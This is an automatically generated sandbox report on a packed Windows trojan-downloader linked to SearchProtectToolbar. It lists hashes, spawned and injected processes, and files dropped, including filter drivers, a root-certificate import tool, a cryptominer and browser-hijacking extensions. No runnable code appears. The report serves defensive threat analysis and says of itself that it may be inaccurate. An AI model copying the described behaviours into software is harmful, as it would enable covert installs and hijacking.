Skip to main content

SearchProtectToolbar_pcap_a106c38e96


HEUR:Trojan-Downloader.Win32.Generic (Kaspersky), Trojan.NSIS.StartPage.FD, Trojan.Win32.Delphi.FD, Trojan.Win32.Sasfis.FD, VirTool.Win32.DelfInject.FD, SearchProtectToolbar_pcap.YR, mzpefinder_pcap_file.YR, SearchProtectToolbar.YR (Lavasoft MAS)Behaviour: Trojan-Downloader, Trojan, VirTool

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

MD5: a106c38e961227fe401fed3e357285bc

SHA1: 0f20114e27ce4a22b68bd6b326d6033183ccfa24

SHA256: 1c17b3de2308f87d3e9cbee15e9938a8d81377195f8f4fc6030b09e7a1352046

SSDeep: 1536:RQpQ5EP0ijnRTXJz54Gc9 BUM/wAcP0lscLD8F:RQIURTXJz54GW BUM/w9if6

Size: 71112 bytes

File type: EXE

Platform: WIN32

Entropy: Packed

PEID: UPolyXv05_v6

Company: g3CvT78vSMa0N0LPai7QvtmUwmghB

Created at: 2009-12-06 00:50:46

Analyzed on: Windows7Ada SP1 64-bit

Summary: Trojan-Downloader. Trojan program, which downloads files from the Internet without user's notice and executes them.

Dynamic Analysis

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

ProtectService.exe:3580
ProtectService.exe:3668
g3CvT78vSMa0N0LPai7Qvt_mb_1.exe:1884
ProtectWindowsManager.exe:3736
ProtectWindowsManager.exe:3316
import_root_cert.exe:3188
15094FED_stp.EXE:3668
cpuminer-x11opt-setup.exe:3752
DesProtetor.exe:536
wpm_v20.0.0.2227.exe:3268
g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_nj.exe:3948
QQBrowser.exe:3824
QQBrowser.exe:3212
g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_br.exe:3816
powershell.exe:3772
powershell.exe:3656
powershell.exe:3376
g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_am2.exe:3564
g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_cp.exe:3480
XTab_Setup2253.exe:1748
cmdshell.exe:3596
g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_a9.exe:3400
amisid.exe:3516
g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_gs.exe:4024
nfregdrv.exe:3588
nfregdrv.exe:3076
nfregdrv.exe:1648
nfregdrv.exe:3924
nfregdrv.exe:3192
HPNotify.exe:3640
CashReminder.exe:3984
g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_cr.exe:1520
ActSys.exe:148
certutil.exe:3280
g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_ps.exe:3268
amisetup2899__9664.exe:3368
GOSafer.exe:3264
WNet.exe:4016
310714_is.exe:948

The Trojan injects its code into the following process(es):

DesProtetor.exe:4032
%original file name%.exe:1512
CashReminder.exe:1108
ActSys.exe:3756
GOSafer.exe:3284
WNet.exe:3080

Mutexes

The following mutexes were created/opened:

ZonesLockedCacheCounterMutexZonesCacheCounterMutex

File activity

The process ProtectService.exe:3580 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Program Files% (x86)\XTab\msvcp110.dll (536 bytes)
%Program Files% (x86)\XTab\msvcr110.dll (876 bytes)

The process ProtectService.exe:3668 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Program Files% (x86)\XTab\CmdShell.exe (32 bytes)

The process g3CvT78vSMa0N0LPai7Qvt_mb_1.exe:1884 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\mt-core[1].js (42633 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\contabilizar[1].htm (162 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\error[1] (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\icone_cadeado[1].gif (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\verificar_ip[1].htm (105 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\error[1] (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssD4BE.tmp\nsWeb.dll (20 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\i[1].gif (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\top-line[1].gif (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\8Hk4o[1].htm (185 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\SL2[1].gif (43 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\carregando[1].gif (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\s9[1].gif (43 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\warning[1] (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\310113f8[1].htm (1006 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\010914i[1].htm (308 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssD4BD.tmp (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\MobiMidia_validation[1].js (865 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\150814c[1].htm (637 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\carregando3[1].gif (1 bytes)

The process ProtectWindowsManager.exe:3736 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\up[1].htm (1 bytes)
C:\ProgramData\WindowsMangerProtect\update\conf (1 bytes)

The process import_root_cert.exe:3188 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\certutil.exe (90 bytes)

The process 15094FED_stp.EXE:3668 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Program Files% (x86)\DesProtetor\uninst.exe (1305 bytes)
%Program Files% (x86)\DesProtetor\nfregdrv.exe (1601 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsh2AB9.tmp\System.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsx2A2C.tmp (74611 bytes)
%Program Files% (x86)\DesProtetor\ssleay32.dll (12088 bytes)
%Program Files% (x86)\DesProtetor\nfapi.dll (4992 bytes)
%Program Files% (x86)\DesProtetor\desprotetordrv.sys (1856 bytes)
C:\Windows\System32\drivers\desprotetordrv.sys (51 bytes)
%Program Files% (x86)\DesProtetor\libeay32.dll (35507 bytes)
%Program Files% (x86)\DesProtetor\DesProtetor.exe (15982 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsh2AB9.tmp\SimpleSC.dll (1921 bytes)
%Program Files% (x86)\DesProtetor\ProtocolFilters.dll (9320 bytes)

The process cpuminer-x11opt-setup.exe:3752 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshEB58.tmp\CPUFeatures.dll (20 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshEB58.tmp\System.dll (23 bytes)
C:\Windows\System32\cpuminer-gw64.exe (41231 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshEB58.tmp\nsProcess.dll (12 bytes)
C:\Windows\System32\cpuminer-conf.json (420 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\cpuminer\cpuminer-uninst.exe (1279 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshEB58.tmp\UserInfo.dll (8 bytes)

The process DesProtetor.exe:536 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Program Files% (x86)\DesProtetor\ProtocolFilters.dll (249 bytes)

The process DesProtetor.exe:4032 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\rules[5].txt (111 bytes)
C:\Windows\Temp\P_RuleList.txt (111 bytes)

The process wpm_v20.0.0.2227.exe:3268 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

C:\ProgramData\WindowsMangerProtect\ProtectWindowsManager.exe (2444 bytes)

The process g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_nj.exe:3948 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Program Files% (x86)\ActSys\asfilterdrv.sys (1856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\smime3.dll (3616 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsxF307.tmp\SelfDel.dll (13 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\softokn3.dll (12536 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\nspr4.dll (6360 bytes)
%Program Files% (x86)\ActSys\ssleay32.dll (12088 bytes)
%Program Files% (x86)\ActSys\remove_ActSys.exe (313 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsxF307.tmp\System.dll (23 bytes)
C:\Windows\System32\drivers\asfilterdrv.sys (56 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\mozcrt19.dll (23936 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsxF307.tmp\nsExec.dll (14 bytes)
%Program Files% (x86)\ActSys\ProtocolFilters.dll (38495 bytes)
%Program Files% (x86)\ActSys\ActSys.exe (15990 bytes)
%Program Files% (x86)\ActSys\libeay32.dll (35507 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsxF307.tmp\SimpleSC.dll (1921 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nscF0B5.tmp (140252 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\certutil.exe (3312 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\plc4.dll (784 bytes)
%Program Files% (x86)\ActSys\nfregdrv.exe (1601 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\nss3.dll (12536 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\NJaxIntermediate.cer (774 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\plds4.dll (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss (4 bytes)
%Program Files% (x86)\ActSys\nfapi.dll (4992 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\import_root_cert.exe (3406 bytes)

The process QQBrowser.exe:3824 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp\RegWrite.exe (86 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp\wpm_v20.0.0.2227.exe (676 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp\ChromeSync.exe (286 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp\XTab_Setup2253.exe (148 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp\479.db (288 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WebDataJs (40 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp\ClearnC.exe (114 bytes)

The process QQBrowser.exe:3212 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\skin\icon.png (628 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\index.html (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\prefs.js (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\modules\aes.js (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\code\code1.jpg (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\skin\default_logo.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\lib\jquery.autocomplete.js (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\479.json (512 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\skin\newtab.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\fr\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\pack\xagainit.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\module\mostgrid.js (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\code\code2.jpg (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\modules\misc.js (11 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\button1.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\modules\settings.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\skin\google_trends.png (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\pack\common.js (10 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\checkbox_select.png (783 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\MessageBox.xml (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\code\code5.jpg (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\en-US\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\js.js (660 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\pl\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\bg1.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\skin\simple.css (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\fr-CH\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\bk_shadow.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\defaults\preferences\preferences.js (379 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\loading_bg.png (159 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\scrollbar.bmp (37 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\modules\addonmanager.js (531 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\code\code4.jpg (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\zh-TW\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions.json (196 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\ru\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\code\code3.jpg (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\button.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\install.rdf (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\code\code6.jpg (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\lib\doT.min.js (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\module\hotSearch.js (6 bytes)
C:\Users\Public\Desktop\Mozilla Firefox.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\min.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\skin\googlelogo.png (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\fr-LU\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\fr-BE\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\QQBrowserFrame.dll (110 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\include\tools\misc.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\uninstallDlg2.xml (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\module\stat.js (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\vi\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\tr\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\checked.png (222 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\modules\restoreprefs.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\checkbox.png (545 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\en\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome.manifest (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\modules\properties.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\pack\ga.js (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions.ini (486 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\skin\logo.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\bg.png (673 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\include\tools\about_blank_hook.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\lib\jquery-2.1.0.min.js (3312 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\include\tools\popup_image_helper.js (693 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\loading_light.png (139 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\pt-BR\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\es\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\unchecked.png (135 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\quick_start.js (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\include\tools\urlrequestor.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\module\search.js (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\modules\last_tab.js (4 bytes)
C:\Users\Public\Desktop\Google Chrome.lnk (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\skin\style.css (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\it\locale.properties (1 bytes)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome\Google Chrome.lnk (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\it-CH\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\UninstallManager.exe (14022 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\83B.tmp (110 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\code\Thumbs.db (42 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\include\speed_dial.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\es-419\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\skin\loading.gif (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\quick_start.xul (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\close.png (3 bytes)
%Program Files% (x86)\Mozilla Firefox\browser\searchplugins\istartsurf.xml (553 bytes)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\ru-MO\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\Thumbs.db (27 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\modules\remoterequest.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\zh-CN\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\81A.tmp (110 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\defaults\preferences\fvd.js (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\fr-CA\locale.properties (2 bytes)

The process g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_br.exe:3816 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Program Files% (x86)\WNet\ssfilterdrv.sys (1856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssEEA4.tmp\SimpleSC.dll (1921 bytes)
C:\Windows\System32\drivers\ssfilterdrv.sys (51 bytes)
%Program Files% (x86)\WNet\uninst.exe (2792 bytes)
%Program Files% (x86)\WNet\nfregdrv.exe (1601 bytes)
%Program Files% (x86)\WNet\ProtocolFilters.dll (9320 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsmEDE7.tmp (70570 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssEEA4.tmp\SelfDel.dll (13 bytes)
%Program Files% (x86)\WNet\ssleay32.dll (12088 bytes)
%Program Files% (x86)\WNet\WNet.exe (15606 bytes)
%Program Files% (x86)\WNet\libeay32.dll (35507 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssEEA4.tmp\System.dll (23 bytes)
%Program Files% (x86)\WNet\nfapi.dll (4992 bytes)

The process %original file name%.exe:1512 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\error[2] (1 bytes)
